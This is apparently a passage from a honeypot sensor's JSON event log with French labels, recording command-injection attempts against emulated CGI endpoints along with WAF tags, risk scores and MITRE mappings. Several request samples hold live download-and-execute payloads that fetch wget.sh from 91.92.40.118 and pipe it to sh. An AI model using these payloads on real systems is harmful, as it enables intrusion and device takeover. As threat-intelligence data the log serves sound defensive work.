la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8080, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/login.php\u0022, \u0022request_line\u0022: \u0022POST \/login.php HTTP\/1.1\u0022, \u0022port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8080 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/login.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/login.php HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 187\\r\\nConnectio\u0022, \u0022target_port_label\u0022: \u00228080 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228080\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_credential_body\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8080","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_credential_body\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_login\u0022, \u0022http_ssrf_body\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":327},{"id":10981924,"ip":"45.153.34.219","ts":"2026-07-11 05:55:04.000000","proto":"tcp","src_port":48832,"dst_port":8080,"service":"http","classification":"cmd_injection","waf_score":53,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/ping.cgi","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a206e67696e782f312e32342e300d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 81, \u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022c9908f9a31aefa5902e21ee9fa132cbe056c536d\u0022, \u0022http_target_hash\u0022: \u002265fac1e13662738a1c1aa1ef0f221b11f428cd4f\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 324, \u0022payload_entropy\u0022: 5.147675433777215, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8080, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022993a3c17e64de6b9641287d9dc0fcafccac556e1\u0022, \u0022event_fingerprint\u0022: \u00228cc2816cbdc378460ca84657ac26a1632df9866c\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022SSRF Localhost SSRF\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022eb4d7b994cbb08f32b3f25f1d001ba15\u0022, \u0022path_pattern_hash\u0022: \u002291fcd1c4583f12f0d549686f6919e21b\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nCo\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/ping.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nConnection: close\\r\\n\\r\\nhost=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s planet;busybox wget http:\/\/91.92.40.118\/wge\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nCo\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/ping.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nConnection: close\\r\\n\\r\\nhost=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s planet;busybox wget http:\/\/91.92.40.118\/wge\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nCo\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221022fd2336f46a70cff853d1e0b08f02e73b883f\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/ping.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nCo\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8080 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/ping.cgi\u0022, \u0022target_port_label\u0022: \u00228080 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8080, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/ping.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\u0022, \u0022port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:8080 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/ping.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/ping.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:8080\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 177\\r\\nCo\u0022, \u0022target_port_label\u0022: \u00228080 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228080\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8080","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":324},{"id":10981920,"ip":"45.153.34.219","ts":"2026-07-11 05:55:02.000000","proto":"tcp","src_port":48826,"dst_port":8080,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a206e67696e782f312e32342e300d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 81, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022c9908f9a31aefa5902e21ee9fa132cbe056c536d\u0022, \u0022http_target_hash\u0022: \u0022bf5cfdbdf5631d84e31e22f9dfabb1aefae2eab6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 280, \u0022payload_entropy\u0022: 5.113813252896986, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8080, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022f455312571f0a36c30e7fb3b422e2720bbf6f0a8\u0022, \u0022event_fingerprint\u0022: \u00225fd820f1b7fe1e06e62ff7f967a4e33ad49ab320\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002293a67a45adc7b4487f80fe28aef62e0e\u0022, \u0022path_pattern_hash\u0022: \u0022ec15843da7e74fb7dc1ef4c10e05caa3\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8080, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60\u0022, \u0022query_string\u0022: \u0022time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20raid%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/timeHandler.cgi?time=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20raid%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: 